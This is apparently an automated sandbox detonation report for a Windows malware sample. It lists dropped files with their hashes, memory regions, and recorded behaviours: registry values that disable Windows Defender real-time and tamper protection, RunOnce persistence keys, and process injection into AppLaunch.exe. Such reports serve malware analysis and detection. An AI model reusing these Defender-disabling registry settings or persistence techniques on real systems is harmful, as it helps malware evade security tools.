SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\2AC8.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 03908364b05dadb28325551387fb3b8f
SHA1 22792f7b24999c5ae5a8440a1514a965fb4d8a7d
SHA256 cad5baa8cd44de1f2b4799720d3234734305af495155553b44e0f1fe8c4edec2
SHA512 3099f143082aacd659c70c1cc54bfecf2f775acaff9bb430abc19a251537db3d0b47aea268d100757ab6a65499f2f258e1ec1028a12ed7cc6023d117617b112d

C:\Users\Admin\AppData\Local\Temp\21FA.tmp\21FB.tmp\21FC.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

memory/5204-376-0x0000000000300000-0x000000000030A000-memory.dmp

memory/5204-377-0x00007FFB776C0000-0x00007FFB78181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3335.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\3335.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

memory/4060-387-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/5856-401-0x0000000000430000-0x000000000046E000-memory.dmp

memory/5856-402-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/5856-407-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6bfcef61cf8a27884e4622ecfa12b443
SHA1 e8ffe4900d0d14170e3f58a99db2a83de4aad8eb
SHA256 47dd1c1040f2b0c638f2c0bf9c1083ad2ea3640a32e217c48cda82e4200cd6e0
SHA512 510a0123388d989933b0534c7256905f07d3c60ea886d8c8a26eb2394ec39abbd7a368c4ab2f2893a84d818df48418f18cc679a9cd3f073b548b043adaf78ffe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58459f.TMP

MD5 f9a56700cb8fc84974c66069a61cc034
SHA1 79f2ed56b6a4eb94f19e733f15d536c9f7d737d1
SHA256 cfcdf4bbb50def84adf3f6257fa21dcaeb199c428d1c3c8c684dcc9e266b0a71
SHA512 97e1fb539729335fa8bb78fee75e8aec9e897e476b8503b059aa32c87b32c1442c03f3d4d6fd45ed3ba84cc3f770e21f02c7377bb77dc9eef7da8f672e27871f

memory/4128-508-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/5204-509-0x00007FFB776C0000-0x00007FFB78181000-memory.dmp

memory/4128-514-0x0000000007880000-0x0000000007890000-memory.dmp

memory/5204-516-0x00007FFB776C0000-0x00007FFB78181000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 676dfbfe1896bdda39b65fc37cb65e41
SHA1 b0ad2e3604093c96330d3f3d41ae6c1972f526d3
SHA256 f192cc42956c79c2c627d173b08b19dc7ae4c4c6a85dd8540b3e5fe8778ebb4e
SHA512 4767b9478599033122c9a1e854149f1d049c3c0c2f2bc4178f0a397defc4941d37d58cf53f9f6d2ef698fb8cf1123bf75025258f10fe8dbb3e8bfcd78b335d1d

memory/5856-535-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/5856-536-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7027efc20abde7f7cc7540f603e400f1
SHA1 7052f7263b5d1b3f18c7c9e06884e9630871b688
SHA256 b604a1a73ca32722a37180f6a21defaf9800500e7ff5ab362cd1f237c21c8213
SHA512 2c2cfda15bb854a386b6791f9c10429c0724dab333aa55d6de1d65d365c079b1e349aaff153a618fd15a5f919cf715737243b66e0f64af9f1da138886c91bae7

memory/752-548-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/752-549-0x0000000000100000-0x000000000102A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1588-575-0x00000000005C0000-0x0000000000AD6000-memory.dmp

memory/1588-574-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/752-581-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/1588-580-0x0000000005550000-0x0000000005560000-memory.dmp

memory/1588-582-0x0000000005380000-0x0000000005381000-memory.dmp

memory/1588-583-0x0000000005660000-0x00000000056FC000-memory.dmp

memory/320-585-0x0000000002490000-0x0000000002590000-memory.dmp

memory/320-586-0x0000000002310000-0x0000000002319000-memory.dmp

memory/2540-587-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2540-588-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5388-590-0x00000000043C0000-0x00000000047C5000-memory.dmp

memory/5388-591-0x00000000047D0000-0x00000000050BB000-memory.dmp

memory/1588-595-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/5388-597-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5896-598-0x00000000020F0000-0x000000000214A000-memory.dmp

memory/1588-601-0x0000000005550000-0x0000000005560000-memory.dmp

memory/5896-604-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5896-606-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/2968-608-0x00000000001C0000-0x00000000001DE000-memory.dmp

memory/2968-607-0x0000000000400000-0x0000000000431000-memory.dmp

memory/5828-612-0x0000000000D50000-0x0000000000D6E000-memory.dmp

memory/5828-613-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/2968-623-0x00000000745B0000-0x0000000074D60000-memory.dmp

memory/3248-624-0x0000000003080000-0x0000000003096000-memory.dmp

memory/2540-625-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5828-629-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/5388-630-0x00000000043C0000-0x00000000047C5000-memory.dmp

memory/2968-631-0x0000000004930000-0x0000000004940000-memory.dmp

memory/5388-632-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8f652b725a817f3a39f04d2056194609
SHA1 b0fcd3c05f59baddd22de5a081889a4d7c203b3d
SHA256 9cb609e087b8ce4b733a3217a283f8c1bf6d01f0dd95be72cb040aa141f61f35
SHA512 6e67e615bd8c8c2f9e6dde99828bf43b93e705cf267a6f943d872c812dda89202c3bf99961775aff10ac384b453d2e84980c3e029a77ef0b70f1f3784d55d0c7

memory/5372-638-0x00007FF798200000-0x00007FF7987A1000-memory.dmp

memory/5388-639-0x00000000047D0000-0x00000000050BB000-memory.dmp

memory/1588-641-0x0000000005510000-0x0000000005525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qaaje0tl.rhr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\tmpC967.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpC97C.tmp

MD5 6e98ae51f6cacb49a7830bede7ab9920
SHA1 1b7e9e375bd48cae50343e67ecc376cf5016d4ee
SHA256 192cd04b9a4d80701bb672cc3678912d1df8f6b987c2b4991d9b6bfbe8f011fd
SHA512 3e7cdda870cbde0655cc30c2f7bd3afee96fdfbe420987ae6ea2709089c0a8cbc8bb9187ef3b4ec3f6a019a9a8b465588b61029869f5934e0820b2461c4a9b2b

C:\Users\Admin\AppData\Local\Temp\tmpC9B7.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpC9CD.tmp

MD5 39fe3f97bbb6049da19d68e439f2c8c5
SHA1 d57958704e2976c73f2e2383351af06cdf4cd20e
SHA256 f140aeed6d583ef309700f05e03978621952b0687251f3a28c550232a9258f87
SHA512 7f861a18c475602d791484f6170e47ed15a5df9820d3b225b18c6141df17cd5db53567ce7def90ea34cae9d17a0db477aab9273e45f0636332d3f70adde0fd1c

C:\Users\Admin\AppData\Local\Temp\tmpC9DE.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpC9FA.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:44

Reported

2023-10-10 20:48

Platform

win7-20230831-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2340 set thread context of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 2036 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3064 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2652 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2732 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
